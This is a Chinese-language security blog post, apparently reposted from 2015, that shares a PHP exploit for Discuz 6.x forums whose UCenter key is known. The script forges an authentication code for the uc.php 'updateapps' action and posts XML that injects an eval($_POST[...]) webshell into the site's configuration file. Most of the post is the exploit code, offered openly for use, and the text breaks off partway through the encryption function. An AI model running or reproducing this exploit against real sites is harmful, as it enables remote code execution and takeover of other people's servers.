Nuclear'Atk(核攻击)网络安全实验室
Recent content on Nuclear'Atk(核攻击)网络安全实验室
马上订阅 Nuclear'Atk(核攻击)网络安全实验室 RSS 更新: https://lcx.cc/index.xml
DZ6.x 的 UC_KEY getwebshell exploit
DZ6.x的UC_KEY getwebshell exploit
L.N. (http://ln.sycsec.com/) | 2015-11-17 13:55
网上有dz 7.x和dz x系列的uc_key 利用方式,今天遇到了一个dz6.0的网站,于是分析了下代码,改了下利用程序,分享给需要的人。uc_key getshell 是一个影响比较广存在比较久的漏洞,基本上使用ucenter做用户中心的程序都可以使用,但需要根据特定程序写特定利用。最新版本的dz好像是修补了,没有具体看代码了。
ps:需要或者感觉不错的请挥挥你的小手 点击 “顶”
注意三个地方:
1.在dz6.x中对xml的解析是不一样的,所以需要修改利用exp
$post = uc_unserialize(uc_post_contents());
2.低版本中$UC_API并没有转义,所以不需要提交2个包
$configfile = preg_replace("/define\('UC_API',\s*'.*?'\);/i", "define('UC_API', '$UC_API');", $configfile);
3.低版本的加密函数也是不一样的
<?php
// 代码版权归原作者所有!
$timestamp = time()+10*3600;
$host="127.0.0.1";
$uc_key="Qfp1O0N3h5V356bbUdPer3958dp8X3b55dBa9fKai7s3Q7AbY9I3Hcnc7ec505sa";
$code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $uc_key));
$cmd1='<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<UC_API id="UC_API">http://xxx\');eval($_POST[DOM]);//</UC_API>
</root>';
$html1 = send($cmd1);
echo $html1;
function send($cmd){
global $host,$code;
$message = "POST /dz/api/uc.php?code=".$code." HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Referer: ".$host."\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "Host: ".$host."\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $cmd;
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
$ckey_length = 4;
$key = md5($key ? $key : UC_KEY);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result...剩余内容已隐藏